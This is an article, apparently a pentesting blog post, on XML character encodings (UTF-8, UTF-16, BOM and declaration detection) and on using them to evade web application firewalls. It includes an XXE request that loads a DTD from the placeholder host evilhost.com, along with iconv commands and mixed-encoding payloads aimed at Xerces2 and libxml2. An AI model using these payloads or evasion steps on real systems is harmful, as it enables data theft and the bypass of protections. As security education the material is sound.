WAFs see white noise instead of a document!
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <?xml version="1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0" encoding="UT |
00000020 | 462D 3136 4245 2200 3F00 3E00 3C00 6100 | F-16BE".?.>.<.a. |
00000030 | 3E00 3100 3300 3300 3700 3C00 2F00 6100 | >.1.3.3.7.<./.a. |
00000040 | 3E | > |
This article is a short story about encodings in XML and how to use them to bypass WAFs.
Which encodings work in XML
The specification requires parsers to understand two encodings: UTF-8 and UTF-16. Parsers support more, but these two are enough for an attack.
UTF-8 and UTF-16 encode the same characters from the Unicode table.
The difference between the encodings is how they store the character's number (its code point).
UTF-8
One character takes from one to four bytes.
The character code is stored according to this pattern:
Number of bytes | Significant bits | Binary code |
1 | 7 | 0xxxxxxx |
2 | 11 | 110xxxxx 10xxxxxx |
3 | 16 | 1110xxxx 10xxxxxx 10xxxxxx |
4 | 21 | 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx |
A character must not be encoded with more bytes than it needs (a so-called overlong form): only the shortest encoding is valid.
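To see the patterns from the table on real bytes, here is a small shell sketch in the same style as the commands later in the article. It assumes a POSIX `sh` with `od` and `iconv` available; `hex` is a hypothetical helper, and octal escapes are used so the script does not depend on the editor's encoding. The last step feeds an overlong two-byte form of `<` (C0 BC) to iconv, which as a strict decoder should refuse it.

```sh
#!/bin/sh
# hex: hypothetical helper that prints stdin as one lowercase hex string.
hex() { od -An -tx1 | tr -d ' \n'; echo; }

# One character of each length from the table (octal escapes = raw bytes).
printf 'A'                | hex   # U+0041  -> 41        (1 byte)
printf '\303\251'         | hex   # U+00E9  -> c3a9      (2 bytes)
printf '\342\202\254'     | hex   # U+20AC  -> e282ac    (3 bytes)
printf '\360\235\233\245' | hex   # U+1D6E5 -> f09d9ba5  (4 bytes)

# Overlong two-byte form of '<' (0x3C) is C0 BC; a strict decoder rejects it.
if printf '\300\274' | iconv -f UTF-8 -t UTF-16BE >/dev/null 2>&1; then
  echo "overlong form accepted"
else
  echo "overlong form rejected"
fi
```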
UTF-16
One character takes two or four bytes.
The character code is stored according to this pattern:
Number of bytes | Significant bits | Binary code |
2 | 16 | xxxxxxxx xxxxxxxx |
4* | 20 | 110110xx xxxxxxxx 110111xx xxxxxxxx |
* 0x10000 is first subtracted from the code point.
Writing a character with four bytes is called a surrogate pair. The pair consists of two ordinary two-byte units, but taken from a reserved range, U+D800 to U+DFFF. Neither half is a valid character on its own.
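The four-byte rule can be checked with plain shell arithmetic. `surrogates` below is a hypothetical helper written for illustration: it subtracts 0x10000, then spreads the remaining 20 bits over the `110110xx` and `110111xx` halves from the table. It assumes a POSIX shell whose `$(( ))` accepts hex constants.

```sh
#!/bin/sh
# surrogates: hypothetical helper that splits a code point above U+FFFF
# into its UTF-16 high and low surrogates.
surrogates() {
  v=$(( $1 - 0x10000 ))             # 20 significant bits remain
  hi=$(( 0xD800 + (v >> 10) ))      # top 10 bits    -> 110110xx xxxxxxxx
  lo=$(( 0xDC00 + (v & 0x3FF) ))    # bottom 10 bits -> 110111xx xxxxxxxx
  printf '%04X %04X\n' "$hi" "$lo"
}

surrogates 0x1D6E5    # D835 DEE5
surrogates 0x10000    # D800 DC00 (first code point that needs a pair)
surrogates 0x10FFFF   # DBFF DFFF (last Unicode code point)
```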
UTF-16 comes in two kinds, UTF-16BE and UTF-16LE (big-endian and little-endian), which differ in byte order.
Big-endian is the “natural” byte order: the most significant byte comes first, as with the digits of Arabic numerals.
Little-endian stores the bytes in reverse order.
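The two byte orders are easy to compare with iconv, which the article also uses later to build payloads. This sketch assumes an iconv that accepts the `UTF-16BE` and `UTF-16LE` names (glibc and GNU libiconv do) and again uses a hypothetical `hex` helper. The last line uses `dd conv=swab`, which swaps every pair of bytes: applied to the big-endian surrogate pair, it yields the little-endian form, because each two-byte half is flipped on its own while the halves keep their order.

```sh
#!/bin/sh
hex() { od -An -tx1 | tr -d ' \n'; echo; }   # hypothetical helper

# '?' (U+003F) in both byte orders.
printf '?' | iconv -f UTF-8 -t UTF-16BE | hex                  # 003f
printf '?' | iconv -f UTF-8 -t UTF-16LE | hex                  # 3f00

# U+1D6E5 (UTF-8 bytes F0 9D 9B A5) needs a surrogate pair.
printf '\360\235\233\245' | iconv -f UTF-8 -t UTF-16BE | hex   # d835dee5
printf '\360\235\233\245' | iconv -f UTF-8 -t UTF-16LE | hex   # 35d8e5de

# BE -> LE: swap the bytes inside each 2-byte unit; the units keep their order.
printf '\330\065\336\345' | dd conv=swab 2>/dev/null | hex     # 35d8e5de
```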
Examples of characters written in UTF-16BE and UTF-16LE
Encoding | Character | Binary code |
UTF-16BE | U+003F | 00000000 00111111 |
UTF-16LE | U+003F | 00111111 00000000 |
UTF-16BE* | U+1D6E5 | 110110 00 00110101 110111 10 11100101 |
UTF-16LE* | U+1D6E5 | 00110101 110110 00 11100101 110111 10 |
* In four-byte characters, each two-byte half is byte-swapped separately. This is done for backward compatibility with Unicode 1.0, where every character took exactly two bytes.
How parsers determine the encoding
Parsers determine the encoding in four ways:
External encoding information
Some network protocols have a dedicated field for the encoding:
[Figure: encoding transmitted in WebDAV]
Most often these are protocols built on the MIME standard, for example SMTP, HTTP, and WebDAV.
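In HTTP, for instance, the encoding travels in the `charset` parameter of the `Content-Type` header, such as `text/xml; charset=UTF-16BE`. The sketch below pulls that value out of a header value. `charset_of` is a hypothetical helper and deliberately simplified: it matches only a lowercase `charset=` and ignores the full MIME parameter syntax.

```sh
#!/bin/sh
# charset_of: hypothetical, simplified helper that prints the charset
# parameter of a Content-Type value (quotes stripped), or nothing if absent.
charset_of() {
  printf '%s\n' "$1" | sed -n 's/"//g; s/.*charset=\([A-Za-z0-9._:-]*\).*/\1/p'
}

charset_of 'text/xml; charset=UTF-16BE'    # UTF-16BE
charset_of 'text/xml; charset="utf-8"'     # utf-8
charset_of 'text/xml'                      # (prints nothing)
```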
Byte Order Mark (BOM)
The BOM is the character U+FEFF.
If the parser finds it at the very beginning of the document, it determines the encoding from how that character is written.
Popular encodings and their BOMs
Encoding | BOM | Example (hex) | Text |
UTF-8 | EF BB BF | EF BB BF 3C 3F 78 6D 6C | ...<?xml |
UTF-16BE | FE FF | FE FF 00 3C 00 3F 00 78 00 6D 00 6C | ...<.?.x.m.l |
UTF-16LE | FF FE | FF FE 3C 00 3F 00 78 00 6D 00 6C 00 | ..<.?.x.m.l. |
The BOM only works at the very beginning of the document. Anywhere else it is read as a zero-width no-break space or causes an error.
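A parser's BOM check boils down to comparing the first bytes of the document with the table above. The sketch below does this for a document on standard input; `detect_bom` is a hypothetical helper that only knows the three BOMs listed in the table. The UTF-16 samples are built by writing the BOM bytes and then transcoding the rest with iconv.

```sh
#!/bin/sh
# detect_bom: hypothetical helper; reads a document on stdin and names the
# encoding implied by its BOM, or "none" if it does not start with one.
detect_bom() {
  start=$(od -An -tx1 -N3 | tr -d ' \n')   # first three bytes as hex
  case "$start" in
    efbbbf) echo UTF-8 ;;
    feff*)  echo UTF-16BE ;;
    fffe*)  echo UTF-16LE ;;
    *)      echo none ;;
  esac
}

printf '\357\273\277<?xml' | detect_bom                                # UTF-8
{ printf '\376\377'; printf '<?xml' | iconv -f UTF-8 -t UTF-16BE; } | detect_bom   # UTF-16BE
{ printf '\377\376'; printf '<?xml' | iconv -f UTF-8 -t UTF-16LE; } | detect_bom   # UTF-16LE
printf '<?xml' | detect_bom                                            # none
```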
By the first characters of the document
The specification allows the parser to look at the first four bytes and determine the encoding from them:
Encoding | Document start (hex) | Text |
UTF-8, ISO 646, ASCII | 3C 3F 78 6D | <?xm |
UTF-16BE | 00 3C 00 3F | .<.? |
UTF-16LE | 3C 00 3F 00 | <.?. |
This only works for documents that start with an XML declaration.
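Without a BOM, the same idea works on the first four bytes, following the table above. `sniff_start` is another hypothetical helper; like the rule it implements, it can only tell the families apart (it cannot distinguish UTF-8 from ISO-8859-1, for example), and it only recognizes documents that begin with `<?xm`.

```sh
#!/bin/sh
# sniff_start: hypothetical helper; guesses the encoding family of a
# BOM-less XML document on stdin from its first four bytes.
sniff_start() {
  start=$(od -An -tx1 -N4 | tr -d ' \n')
  case "$start" in
    3c3f786d) echo "UTF-8 or another ASCII-compatible encoding" ;;
    003c003f) echo UTF-16BE ;;
    3c003f00) echo UTF-16LE ;;
    *)        echo unknown ;;
  esac
}

decl='<?xml version="1.0"?>'
printf '%s' "$decl" | sniff_start                              # UTF-8 or another ASCII-compatible encoding
printf '%s' "$decl" | iconv -f UTF-8 -t UTF-16BE | sniff_start # UTF-16BE
printf '%s' "$decl" | iconv -f UTF-8 -t UTF-16LE | sniff_start # UTF-16LE
```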
From the XML declaration
The encoding can be specified in the XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
The XML declaration is a line written at the very beginning of the document. From it, the parser learns the format of the document.
<?xml version="1.0" encoding="ISO-8859-1" ?> <très>là </très>
The document is encoded in ISO-8859-1.
To read the declaration, the parser apparently must already know the encoding. Still, the declaration helps to choose between similar encodings, for example those compatible with ASCII.
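A sketch of why the declaration still helps: the document below is written byte for byte in ISO-8859-1, like the example above. Its first four bytes only say "ASCII-compatible", but the `encoding` value can then be read as plain ASCII and used to decode the rest. The file is a temporary one, and the `sed` expression is a simplified stand-in for a real declaration parser, not how any particular parser does it.

```sh
#!/bin/sh
doc=$(mktemp)
# In ISO-8859-1, 'è' is the single byte E8 (octal 350) and 'à' is E0 (octal 340).
printf '<?xml version="1.0" encoding="ISO-8859-1"?><tr\350s>l\340</tr\350s>' > "$doc"

od -An -tx1 -N4 "$doc"    # 3c 3f 78 6d: only "ASCII-compatible" so far

# The declaration itself is pure ASCII, so the encoding name can be read first.
# LC_ALL=C keeps sed from tripping over the non-UTF-8 bytes later in the line.
enc=$(LC_ALL=C sed -n 's/.*encoding="\([^"]*\)".*/\1/p' "$doc")
echo "$enc"               # ISO-8859-1

# The name is then used to decode the whole document.
iconv -f "$enc" -t UTF-8 "$doc"; echo
```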
Standard WAF bypass
The easiest option is to switch to an encoding that is incompatible with ASCII and hope that the WAF does not understand it.
This method worked at the WAF Bypass competition in 2015, where participants had to read the flag through an XXE vulnerability:
XXE exploitation request from the competition:
POST / HTTP/1.1
Host: d3rr0r1m.waf-bypass.phdays.com
Connection: close
Content-Type: text/xml
User-Agent: Mozilla/5.0
Content-Length: 166

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd">
%xxe;
]>
<root>
<method>test</method>
</root>
One solution is to transcode the request body into UTF-16BE without a BOM:
cat original.xml | iconv -f UTF-8 -t UTF-16BE > payload.xml
The WAF saw no danger in this document and let the request through.
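To see why this works against signature matching, here is a deliberately naive stand-in for a WAF: a `grep` for the `ENTITY` keyword in the raw body. Real WAFs are more elaborate, so treat `naive_waf` as a hypothetical illustration only. The body is the one from the competition request, transcoded with the same iconv call; in UTF-16BE every ASCII character gains a 00 byte, so the byte string `ENTITY` no longer occurs.

```sh
#!/bin/sh
# naive_waf: hypothetical toy filter that blocks any body containing the
# byte string ENTITY.
naive_waf() {
  if grep -q 'ENTITY' "$1"; then echo blocked; else echo passed; fi
}

original=$(mktemp); payload=$(mktemp)
printf '%s\n' '<?xml version="1.0"?>' \
  '<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://evilhost.com/waf.dtd"> %xxe; ]>' \
  '<root> <method>test</method> </root>' > "$original"

# Same transcoding as in the text: UTF-16BE, no BOM.
iconv -f UTF-8 -t UTF-16BE < "$original" > "$payload"

naive_waf "$original"   # blocked
naive_waf "$payload"    # passed
```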
Bypass using two encodings
Another way to confuse a WAF is to encode the XML in two encodings at once.
As soon as the parser reads the encoding from the declaration, it switches to it, even if the new encoding is incompatible with the one the declaration itself is written in.
If the declaration and the rest of the document are in different encodings, WAFs cannot make sense of it.
Xerces2 Java parser
The declaration is in ASCII, the rest in UTF-16BE:
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <?xml version="1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0" encoding="UT |
00000020 | 462D 3136 4245 223F 3E00 3C00 6100 3E00 | F-16BE"?>.<.a.>. |
00000030 | 3100 3300 3300 3700 3C00 2F00 6100 3E | 1.3.3.7.<./.a.> |
Commands to build it:
echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
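The same file can be built with `printf '%s'` instead of `echo -n`, which not every `sh` supports. `printf` also omits the trailing newline that `echo` adds, so the result matches the Xerces2 dump above byte for byte (63 bytes). `build_payload` is a hypothetical helper that takes the ASCII prefix and the part to transcode.

```sh
#!/bin/sh
# build_payload: hypothetical helper. Writes $1 as-is (ASCII), then $2
# transcoded to UTF-16BE, into file $3.
build_payload() {
  printf '%s' "$1" > "$3"
  printf '%s' "$2" | iconv -f UTF-8 -t UTF-16BE >> "$3"
}

out=$(mktemp)
build_payload '<?xml version="1.0" encoding="UTF-16BE"?>' '<a>1337</a>' "$out"

wc -c < "$out"                  # 63
od -An -tx1 -j 38 -N 6 "$out"   # 22 3f 3e 00 3c 00: ASCII '"?>', then UTF-16BE '<'
```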
libxml2
libxml2 switches the encoding as soon as it reads the encoding attribute. Therefore, we switch the encoding before the declaration is closed:
00000000 | 3C3F 786D 6C20 7665 7273 696F 6E3D 2231 | <?xml version="1 |
00000010 | 2E30 2220 656E 636F 6469 6E67 3D22 5554 | .0" encoding="UT |
00000020 | 462D 3136 4245 2200 3F00 3E00 3C00 6100 | F-16BE".?.>.<.a. |
00000030 | 3E00 3100 3300 3300 3700 3C00 2F00 6100 | >.1.3.3.7.<./.a. |
00000040 | 3E | > |
Commands to build it:
echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
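To double-check such a payload, it helps to decode it the way the text describes libxml2 reading it: ASCII up to the closing quote of the `encoding` attribute, UTF-16BE from `?>` on. The sketch below is only a rough simulation of that split, not libxml2 itself. `decode_mixed` is a hypothetical helper, and the payload is built with `printf '%s'` so it has no trailing newline (65 bytes, like the libxml2 dump above).

```sh
#!/bin/sh
# decode_mixed: hypothetical helper. Prints the first $2 bytes of file $1
# unchanged (ASCII), then decodes the remainder from UTF-16BE.
decode_mixed() {
  dd if="$1" bs=1 count="$2" 2>/dev/null
  tail -c +"$(( $2 + 1 ))" "$1" | iconv -f UTF-16BE -t UTF-8
}

prefix='<?xml version="1.0" encoding="UTF-16BE"'
payload=$(mktemp)
printf '%s' "$prefix" > "$payload"
printf '%s' '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> "$payload"

# ${#prefix} is 39: the ASCII part ends right after the closing quote.
decode_mixed "$payload" "${#prefix}"; echo
# <?xml version="1.0" encoding="UTF-16BE"?><a>1337</a>
```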
Happy pentesting!